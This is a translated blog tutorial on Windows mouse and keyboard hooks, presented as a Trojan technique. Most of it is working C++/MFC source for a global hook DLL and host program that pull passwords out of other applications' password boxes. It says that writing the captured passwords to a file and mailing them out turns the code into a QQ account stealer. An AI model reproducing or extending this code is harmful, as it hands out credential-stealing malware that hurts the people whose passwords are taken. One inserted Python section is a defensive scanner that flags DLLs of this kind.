Hooking mouse and keyboard messages: an example analysis

Source: Internet
Author: User

Trojan horse control and communication methods include dual pipes, port reuse, rebound (reverse-connection) techniques, and hooks. Today's focus is an introduction to the use of hooks. The information a hook captures can be sent to the attacker's mailbox, for example, which is how the attack achieves its purpose.

Transferred from: http://hi.baidu.com/mousetopshow/item/a951102d679f6e8f9c63d1b0

Hooks can intercept messages that the system sends to other applications, so they can do things an ordinary program cannot. It is therefore necessary to understand how hooks are programmed.

Hook categories:
1. WH_CALLWNDPROC and WH_CALLWNDPROCRET: let you monitor messages sent to a window procedure
3. WH_DEBUG: debugging hook
4. WH_FOREGROUNDIDLE: when the foreground thread of an application is about to become idle, the system calls the WH_FOREGROUNDIDLE hook
5. WH_JOURNALRECORD: monitors and records input events
6. WH_JOURNALPLAYBACK: plays back events recorded with WH_JOURNALRECORD
7. WH_KEYBOARD: keyboard hook
9. WH_KEYBOARD_LL: low-level keyboard hook
10. WH_MOUSE: mouse hook
11. WH_MOUSE_LL: low-level mouse hook
12. WH_SHELL: shell hook
13. WH_MSGFILTER and WH_SYSMSGFILTER: let you monitor menus, scroll bars, message boxes, etc.

Installing hooks:
Call the function SetWindowsHookEx to install a hook. The parameters in its prototype are:

idHook represents the hook type, which corresponds one-to-one with the type of hook function, for example WH_KEYBOARD or WH_MOUSE.
lpfn is the address of the hook function.
hMod is the handle of the instance in which the hook function resides. For thread hooks this parameter is NULL; for system hooks it is the handle of the DLL that contains the hook function. (System hooks must be in a DLL.)
dwThreadId specifies the ID of the thread that the hook monitors. For global hooks, this parameter is NULL.
Returns: the handle of the installed hook.

Uninstalling hooks

Call the function BOOL UnhookWindowsHookEx(HHOOK hhk) to uninstall a hook.

Defining hook functions
A hook function is a special callback function. When the specific event that the hook monitors occurs, the system calls the hook function to process it. It generally has the following form:

LRESULT WINAPI MyHookProc(int nCode, WPARAM wParam, LPARAM lParam)

The parameters wParam and lParam contain information about the hooked message, such as the mouse position, status, and keyboard keys. nCode contains information about the message itself, such as whether it has been removed from the message queue.

Example:
Below we install a mouse hook and a keyboard hook that intercept an entered password and reveal a password displayed as asterisks, as an example of how hooks are used.

1. Start the wizard and create a new MFC AppWizard (DLL) project named GetPass; select MFC Extension DLL and finish.
2. Create a new class CGetPassHook with base class CObject, and add the functions StartHook and StopHook, as follows:

3: Add the global shared data, as follows:

#pragma data_seg("Sharedata")
HHOOK hKeyboardHook = NULL;    // keyboard hook
HHOOK hMouseHook = NULL;       // mouse hook
HINSTANCE glhInstance = NULL;  // global instance
HWND hOutPutWnd = NULL;        // window that displays the password
#pragma data_seg()

4: Add the mouse and keyboard hook handler functions, as follows:

LRESULT WINAPI MouseHookProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // mouse hook function
    LPMOUSEHOOKSTRUCT lpMouse = (MOUSEHOOKSTRUCT FAR*)lParam;
    if (nCode >= 0)
    {
        HWND hTargetHwnd = lpMouse->hwnd;  // get the handle of the window under the mouse
        if (hTargetHwnd)
        {
            LONG style = ::GetWindowLong(hTargetHwnd, GWL_STYLE);  // get its style
            if (style & ES_PASSWORD)  // if it is a password box
            {
                char szPass[255];
                ::SendMessage(hTargetHwnd, WM_GETTEXT, 255, (LPARAM)szPass);  // get the password
                ::SendMessage(hOutPutWnd, WM_SETTEXT, 0, (LPARAM)szPass);     // show the password
            }
        }
    }
    // This call passes the message on. Without it, delivery of the message is
    // cancelled, which is how a hook can swallow a message. Here we call it.
    return CallNextHookEx(hMouseHook, nCode, wParam, lParam);
}

LRESULT WINAPI KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
    // keyboard hook procedure
    if (nCode >= 0)
    {
        HWND hTargetHwnd = GetActiveWindow();  // get the active window
        if (hTargetHwnd)
            EnumChildWindows(hTargetHwnd, EnumWndProc, 0);  // enumerate all child windows
    }
    // This call passes the message on. Without it, delivery of the message is
    // cancelled, which is how a hook can swallow a message. Here we call it.
    return CallNextHookEx(hKeyboardHook, nCode, wParam, lParam);
}

Here is a brief introduction to the EnumChildWindows function. Its prototype is:

BOOL EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);

hWndParent: handle of the window to enumerate
lpEnumFunc: address of the enumeration function
lParam: 0 here

5: Add the window enumeration function, as follows. (Note that because the previous function uses this one, it must either be declared earlier or be defined before the function above.)

BOOL WINAPI EnumWndProc(HWND hwnd, LPARAM lParam)
{
    // enumerate the child windows, find the password edit
    if (hwnd)
    {
        LONG style = ::GetWindowLong(hwnd, GWL_STYLE);  // get the style
        if (style & ES_PASSWORD)  // is it a password box?
        {
            char szPass[255];
            ::SendMessage(hwnd, WM_GETTEXT, 255, (LPARAM)szPass);       // get the password
            ::SendMessage(hOutPutWnd, WM_SETTEXT, 0, (LPARAM)szPass);   // show it
            return TRUE;
        }
    }
    return TRUE;
}

6: Define the segment properties in the DEF file (this step is important):
SECTIONS
mydata READ WRITE SHARED

7: Complete the StartHook and StopHook functions, which start and stop the hooks, as follows:

BOOL CGetPassHook::StartHook(HWND hwnd)
{
    // install the hooks
    hMouseHook = SetWindowsHookEx(WH_MOUSE, MouseHookProc, glhInstance, 0);       // mouse hook
    hKeyboardHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, glhInstance, 0);  // keyboard hook
    if (hMouseHook && hKeyboardHook)
    {
        hOutPutWnd = hwnd;  // handle of the window that displays the password
        return TRUE;
    }
    return FALSE;
}

BOOL CGetPassHook::StopHook()
{
    // uninstall the hooks
    BOOL mHook = UnhookWindowsHookEx(hMouseHook);
    BOOL kHook = UnhookWindowsHookEx(hKeyboardHook);
    if (mHook && kHook)
    {
        return TRUE;
    }
    return FALSE;
}

8: The DLL handle is obtained in the DllMain function, which needs the glhInstance variable, so add one line, as follows:

extern HINSTANCE glhInstance;  // remember this declaration
extern "C" int APIENTRY DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
{
    UNREFERENCED_PARAMETER(lpReserved);
    if (dwReason == DLL_PROCESS_ATTACH)
    {
        TRACE0("GetPass.DLL Initializing!\n");
        if (!AfxInitExtensionModule(GetPassDLL, hInstance))
            return 0;
        new CDynLinkLibrary(GetPassDLL);
        glhInstance = hInstance;  // get the handle
    }
    else if (dwReason == DLL_PROCESS_DETACH)
    {
        TRACE0("GetPass.DLL Terminating!\n");
        AfxTermExtensionModule(GetPassDLL);
    }
    return 1;  // OK
}

9: Compile. The DLL part is complete.
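
For defenders, the DLL built in steps 1 to 9 has two static traits that can be checked without running it: a writable section marked SHARED (step 6) and an import of SetWindowsHookEx. The following Python triage check is an added example, not part of the original article; its function names and the header-only sample images are constructed for illustration. Both traits also occur in legitimate software, so a hit means "review this file", not "malicious".

```python
import struct

IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def shared_writable_sections(pe: bytes) -> list:
    """Names of PE sections that are both writable and shared across processes."""
    if pe[:2] != b"MZ" or len(pe) < 0x40:
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    # The 20-byte COFF header follows the 4-byte signature.
    (n_sections,) = struct.unpack_from("<H", pe, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size          # section table starts after the optional header
    hits = []
    for i in range(n_sections):
        off = table + 40 * i                  # each section header is 40 bytes
        if off + 40 > len(pe):
            raise ValueError("truncated section table")
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        (flags,) = struct.unpack_from("<I", pe, off + 36)
        if flags & IMAGE_SCN_MEM_SHARED and flags & IMAGE_SCN_MEM_WRITE:
            hits.append(name)
    return hits

def triage(pe: bytes) -> dict:
    """Flag images that pair a shared writable section with a hook-install import."""
    shared = shared_writable_sections(pe)
    imports_hook = b"SetWindowsHookEx" in pe  # crude string match, covers the A and W variants
    return {"shared_sections": shared, "imports_hook": imports_hook,
            "review": bool(shared) and imports_hook}

def build_sample(sections, strings=b"") -> bytes:
    """Constructed header-only image for this demo; not a loadable DLL."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x2000)
    table = b"".join(name.ljust(8, b"\0") + struct.pack("<6I2HI", 0, 0, 0, 0, 0, 0, 0, 0, flags)
                     for name, flags in sections)
    return dos + coff + table + strings

HOOK_DLL = build_sample([(b".text", 0x60000020), (b".shared", 0xD0000040)], b"SetWindowsHookExA\0")
PLAIN_DLL = build_sample([(b".text", 0x60000020), (b".data", 0xC0000040)])

if __name__ == "__main__":
    print(triage(HOOK_DLL))
    print(triage(PLAIN_DLL))
```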

Next, create the application part, as follows:

1: Create a new MFC AppWizard (EXE) project named GetPassWord, and in the first step choose "Add to current workspace", which is convenient.

2: Copy GetPass.lib and GetPassHook.h from the DLL into the application's directory, then choose Project->Add to Project->Files and select these two files.

2: In the main dialog box, add an edit control with the ID IDC_EDIT_PASS.

3: In CGetPassWordDlg.h, include the GetPassHook.h file and declare an object, as follows:

#include "GetPassHook.h"
class CGetPassWordDlg : public CDialog
{
protected:
    CGetPassHook m_hook;
    ....
    DECLARE_MESSAGE_MAP()
};

4: In the implementation file, start the hook in OnInitDialog():

BOOL CGetPassWordDlg::OnInitDialog()
{
    // install the hook
    CWnd *pWnd = GetDlgItem(IDC_EDIT_PASS);
    m_hook.StartHook(pWnd->GetSafeHwnd());
    return TRUE;  // return TRUE unless you set the focus to a control
}

5: Handle the WM_DESTROY message and stop the hook when the program exits, as follows:

void CGetPassWordDlg::OnDestroy()
{
    CDialog::OnDestroy();
    // stop the hook
    m_hook.StopHook();
}

6: Copy GetPass.dll into the same directory as the .EXE.

7: Compile and run.
This way, when a password is entered in any password box, it is intercepted. Even if the keyboard hook fails, moving the mouse over the password box also retrieves the password displayed as asterisks, because we installed two hooks. Start QQ, enter a password, and see whether it was intercepted. With a small modification to this program, writing the intercepted password to a file and adding mail sending, a QQ account stealer is made.





Copyright notice: this is an original article by the blogger and may not be reproduced without the blogger's permission.
